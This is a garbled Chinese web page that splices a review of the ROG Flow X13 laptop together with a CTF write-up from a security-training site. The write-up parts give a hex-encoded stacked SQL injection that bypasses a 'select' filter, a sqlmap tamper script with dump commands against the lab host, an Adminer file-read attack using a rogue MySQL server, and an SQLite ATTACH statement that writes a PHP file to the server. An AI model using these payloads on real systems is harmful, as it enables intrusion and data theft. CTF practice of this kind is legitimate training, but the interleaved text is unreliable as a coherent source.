高质量的安全文章,安全offer面试经验分享

一、前言:独占锐龙5000移动处理器首次登场 竟是一款轻薄全能本

NVIDIA RTX 30系列笔记本GPU已经是如今游戏本的标准配置,而在年初面向高端的RTX 3080/3070/3060三款型号之后,NVIDIA最近又推出了更主流的RTX 3050 Ti/3050,产品线齐整,并打出了“NVIDIA GeForce RTX 3050笔记本电脑 强者致胜”的口号,相当霸气。

尽在 # 掌控安全EDU #


作者:掌控安全-劲夫

另一方面,游戏本处理器则是Intel酷睿、AMD锐龙平分秋色,但后者作为挑战者更令人瞩目,越来越出色的表现让Intel这个传统霸主坐卧不安。

大家可以根据公布的解题wp来增长知识、加强实战经验!

学习更多思路,文末还有聂风老师提供的其他思路.

比赛虽然已经结束,但题目地址不关闭 ,有兴趣欢迎来战:

https://hack.zkaq.cn/ctf202109.html 

此外部分题目会在9月29日(今天)晚上7点进行视频讲解

今年1月,AMD锐龙5000系列移动版处理器正式发布,包括锐龙5000U系列、锐龙5000H系列,分别面向轻薄本、游戏本两条线。

在众多新款处理器公布之时,有一款型号十分特别的新U特别值得注意,它就是锐龙9 5980HS,定位在锐龙9 5900H系列之上,仅次于顶级的锐龙9 5980HX,热设计功耗仅为35W,但一直都没有实际产品落地,让人好奇它到底能有什么表现。

随着ROG 幻13的发布,谜底终于揭晓。作为AMD为ROG独家定制的特别版处理器,顶级神U锐龙9 5980HS首次登场,并且不同于我们对于游戏本的一般认知,ROG 幻13在轻薄和游戏两方面都做到了极致,堪称全能。

你能否想象在一台13寸轻薄本上塞入发烧级的游戏配置?ROG 幻13就将想象变成了现实。

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图1)

ROG 幻13非常的小巧轻薄,13.4寸的机身,厚度仅有15.8mm,重量也不过1.3kg,拿在手上的感觉和众多轻薄本几乎无异。

而在这轻薄的机身中,ROG不但放入了专属定制的顶级锐龙9 5980HS,还有一张GeForce RTX 3050 Ti独显。

想听的小伙伴访问这个二维码,报名免费的课程就可以

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图2)

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图3)

作为移动端最新的甜点级显卡,RTX 3050 Ti采用了最新的Ampere架构。相较于前代架构,NVIDIA Ampere架构实现了三大改进。

—— SM中FP32的吞吐量翻倍

——第二代RT Cores,光线与三角形求交计算的吞吐量翻倍,动态模糊性能大幅提升

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图4)

签到题#一起下象棋‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍

题目链接:一起下象棋(http://vgtres-b924.aqlab.cn/easy_web/)

进行目录扫描,发现目录下存在robots.txt这个文件,直接访问

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图5)

—— 第三代Tensor Cores,优化稀疏网络性能,大幅提升AI计算效能

借助全新的Ampere架构,主流游戏玩家也可以体验到光追、DLSS等新特性对于游戏的提升。通过NVIDIA的DLSS技术,ROG幻13可以在性能上达到上一代产品的2倍,在多款大型游戏中,可以在1080P下提供60FPS的流畅体验。

ROG幻13的RTX 3050 Ti支持完整的Max-Q特性。这意味着它支持Dynamic Boost 2.0、WhisperMode 2.0、Resizabele BAR和NVIDIA DLSS四项技术。正如NVIDIA的宣传标语“强者致胜”一般,ROG幻13不仅可以提供强大的图形性能,还能通过自由调度,调整CPU及GPU的功耗,来应对多变的性能需求。同时还能够提供更安静的游戏环境。

除了核心配置外,ROG幻13的其他配置也相当能打。一块360度翻转4K高色域触控屏、全尺寸键盘、指纹电源二合一按键等等。所谓的超薄全能本大概就是这个样子,拥有轻薄本的精致设计,同时在性能配置上也丝毫不会让步。

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图6)

发现内容被加密,这个是JSFuck的加密

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图7)

直接将加密的内容复制到控制台就可以获得flag(或者找线上的解码站点也行)

如果你还觉得RTX 3050 Ti的性能有些不够用,那么不用担心,ROG 幻13依然留有一个惊喜。官方专门为其设计了一款小巧精致的扩展坞,采用专用接口无损连接,即可将150W满血功率的RTX 3080移动版变为ROG 幻13的扩展配置。

出差时将扩展坞放在行李箱中,白天外出时携带轻薄的ROG 幻13本体满足移动办公便携的需求,晚上回到酒店,插上扩展坞,ROG 幻13即可变身性能怪兽,让你高画质畅玩各种3A大作。

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图8)

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图9)

二、外观及拆解:13寸大小支持360°翻转宛如轻薄本 自带专属3080扩展坞

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图10)

ROG 幻13的外观风格跟今年的多款新品保持了一致,熟悉的引力波线性波纹搭配金属外壳,既保证了坚固耐用不易沾染指纹,还大大提高了辨识度,可谓一举两得。

ps:喜欢下棋的小伙伴也可以先赢三把人机,赢了之后你就会发现你赢了三局人机

SQL注入关键字绕过

题目链接:SQL注入关键字绕过(http://vgtres-b924.aqlab.cn/)

左下角的ROG铭牌也非常有质感,A面左下角金属铭牌有独特的紫色镀膜,上书SUPERNOVA,是幻13特殊版本的名称,让本就小巧的ROG 幻13更显精致。

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图11)

屏幕采用全面屏设计,16:10的比例,拥有3840×2400的分辨率,属于一块准4K屏幕。此外,屏幕还支持触控操作,搭配360°翻转功能可以瞬间变身平板。摄像头等传感器也采用隐藏式设计,放置在屏幕的上边框之中。

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图12)

全尺寸键盘键程适中,十分适合游戏及打字使用。键盘区左上角还有一列ROG游戏本标志性的快捷键,可以一键调节音量、开关麦克风、呼出奥创中心,让操作更加便捷。

根据聂风老师给出的第二关核心代码,可以看出,这关过滤了select关键字

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图13)

ROG 幻13的转轴也十分特别,支持360°全向调节。按照设计来看,调整成屏幕外翻的“帐篷模式”,整机就可以获得最好的散热风道,从而将性能发挥到极限。

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图14)

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图15)

并且使用了预编译,那么也就意味着我们构造的payload中不能出现select和单双引号

因为机身较为轻薄小巧,所以ROG 幻13的接口也仅仅是满足最低限度的需求。机身左侧是一个USB 3.2接口、一个全功能Type-C接口(DP1.4/100W PD)和一个指纹电源键。

后面的问题好解决,用十六进制编码就可以绕过,但是过滤了select的话就得想其他办法来绕过了

右侧除了熟悉的HDMI 2.0b和3.5mm接口外,还有一个用橡胶盖盖住的特殊接口。打开能看到里面是一个全功能Type-C接口和一个XGM显卡扩展坞接口。用它们共同连接ROG 幻13的专用RTX 3080扩展坞,就可以让ROG 幻13拥有更强的图像性能。

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图16)

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图17)

如果说这个地方存在堆叠注入,那么我们可以可以采用下面的payload来进行绕过

扩展坞的连接线上,XGM接口和Type-C接口是一起固定的,因此外接扩展坞时两个接口均要使用。接头两侧还有固定件,确保连接稳固。

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图18)

和常见的显卡扩展坞相比,ROG幻13的这个专用显卡扩展坞小巧得多。毕竟搭载的是一块RTX 3080移动版显卡,可以有效的控制体积,实际大小来看仅仅跟一本书相当。

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图19)

显卡扩展坞的功能也不仅仅限于连接显卡,它本身也是一个优秀的外设扩展坞,可以提供4个USB 3.2 Type-A接口、一个DP 1.4、一个HDMI 2.0接口以及一个千兆RJ45网口,甚至侧面还有一个SD卡读卡器,可以让ROG幻13的外设连接能力大大提升。

--@x=后面的是字符串,那么也就是说我们可以用十六进制进行替换

;set@x="select sleep(10)";

prepare a from@x;

EXECUTE a;

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图20)

--处理好后的语句也就是这样

;set@x=0x73656c65637420736c65657028313029;

拆开后盖来看看ROG幻13的内部构造。电池几乎占据了笔记本内部一半的空间。双风扇双热管三出风口的散热设计,CPU部分采用液金导热,这也是今年ROG高端游戏本所通用的设计。对于ROG幻13本体锐龙9 5980HS+RTX 3050 Ti的配置来说,这个散热规格绰绰有余。

prepare a from@x;

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图21)

EXECUTE a;

其实想知道这里是否存在堆叠注入很简单,直接把这个payload放到靶场中运行一下就知道了

由于内部空间紧张,内存直接采用了板载设计,双通道32GB LPDDR4X 4266MHz,即便是用于视频特效及建模等生产力任务也已经足够,虽然没有后期升级的余地但也不用担心。

如果有小伙伴就是想知道怎么判断这里他是否存在堆叠注入,其实也有办法

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图22)

M.2插槽仅支持M.2 2230一种尺寸,所以如果需要更换固态要注意规格。机身标配的是1TB的SN530,装有硅脂垫来起到散热的效果。

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图23)

Wi-Fi 6网卡是Intel AX200,支持最高160MHz 2×2 MIMO下2400Mbps的速率。

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图24)

我们传参?id=1a,看他是否报错,如下图,他报错了说明了数据没有被强转

4芯电池,总容量为62Wh。

三、CPU性能测试:首发独占神U性能不俗 功耗更出色

ROG幻13这次首发了其独占的顶级锐龙5000移动处理器,锐龙9 5980HS。

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图25)

然后我们把a改为; 传参?id=1;,它却没有报错,说明;没有被带入查询,而是解析了(;在sql中表示一串sql语句的结束)

和目前市面上常见的两款高端处理器锐龙7 5800H和锐龙9 5900HX相比,它们硬件规格几乎一致,均采用台积电7nm制程,基于Zen3架构,并且同为8核16线程。

锐龙9 5980HS因为体质较好,拥有3.3GHz的基础频率,最大加速频率可以达到4.8GHz之高,而TDP也仅有35W——HX系列都是45W+。

虽然和一些厚重的游戏本相比,锐龙9 5980HS不见得能比过80W的鸡血锐龙7 5800H,但是在常规状态下,在如此轻薄的尺寸下,锐龙9 5980HS无疑能凭借优秀的体制发挥更好的性能。接下来,我们就来测试下它的性能表现如何。

1、CPU-Z

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图26)

在CPU-Z中,单核性能得分598.9,多核得分5685.2。

2、Cinebench R15

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图27)

那么这时候就很大概率确定它存在堆叠注入,外加上面有说这里用了PDO,PDO在没有经过特殊配置的情况下是可以一次执行多条SQL语句的

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图28)

在Cinebench R15中,锐龙9 5980HS的单核得分243cb,多核得分2049cb。

3、Cinebench R20

那么我们就可以利用上面给出的payload来编写sqlmap的绕过脚本

0xduidie.py

#!/usr/bin/env python

import sys

"""

Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)

See the file 'LICENSE' for copying permission

"""

import string

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():

pass

def tamper(payload,**kwargs):

payload ='select 1'+payload

payload = payload.encode().hex()

payload ='1;set @x=0x'+payload+';prepare a from @x;EXECUTE a;'

return payload

将绕过脚本放到sqlmap目录下的tamper目录中,然后执行如下命令吗,获取表名

sqlmap.py -u http://vgtres-b924.aqlab.cn/?id=1 -D maoshe --tables --tamper 0xduidie.py

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图30)

成功跑出表名,flag应该是在flag99这个表中,使用下面的命令直接跑数据

sqlmap.py -u http://vgtres-b924.aqlab.cn/?id=1 -D maoshe -T flag99 --dump --tamper 0xduidie.py

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图31)

成功获取到flag

B组#拿到webshell权限

题目链接:拿到webshell权限(http://gertvv-b924.aqlab.cn/)

进到站点里面啥也没有中国象棋,先进行目录扫描,看看是否可以获取到一些有用的信息

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图32)

我这里使用的是dirsearch这个目录扫描工具,扫出这个站点存在/adminer/这个路径

我们进行访问,发现存在adminer这个文件,并且爆出了绝对路径,那么我们可以尝试看看有什么办法可以进行利用

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图33)

这里提供两种办法

第一种:利用adminer的任意文件读取漏洞(需要有公网服务器)

我这里是一台ubuntu的机器

1.安装mysql服务

apt-get updateapt-get gradeapt-get install mysql-server

2.开启mysql的外联

# 修改下面这个文件

vim /etc/mysql/mysql.conf.d/mysqld.cnf

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图34)

将bind-address这行给注释掉,在最前面加个#就好了,或者把127.0.0.1改成0.0.0.0目的是为了让任意地址可以访问,修改好了之后保存退出

重启Mysql服务

systemctl restart mysql.service

然后下载利用脚本(脚本已放入附件,后台回复:“0574”)

将脚本保存为adminer.py,然后执行如下命令

# 关闭mysql服务,因为adminer.py这个脚本会占用3306端口systemctl stop mysql.servicechmod 777 adminer.py# 这个文件执行之后它会在当前目录生成一个mysql.log文件,待会读取的文件内容就在这里面./adminer.py

脚本运行之后,进到靶场的adminer页面,填入服务器的公网地址,然后账号和密码随便填,然后点击登录

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图35)

反应如下

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图36)查看mysql.log获取flag

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图37)

第二种:利用SQlite直接getshell(同学给出的思路,无需公网服务器)

点击系统,选择SQLite3然后直接点击登录,即可登录进管理界面

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图38)

点击SQL命令,到执行SQL命令的界面

9月份擂台赛官方Writeup,点击查看更多渗透思路13寸全能小怪兽!ROG幻13评测:独占Zen3神U+RTX 30系内外双修 中国象棋(图39)

执行下面这条命令,读取index.php文件中的内容

ATTACH DATABASE 'flag111.php' AS test ;create TABLE test.exp (dataz text); insert INTO test.exp (dataz) VALUES ('<?php echo file_get_contents("../index.php")?>');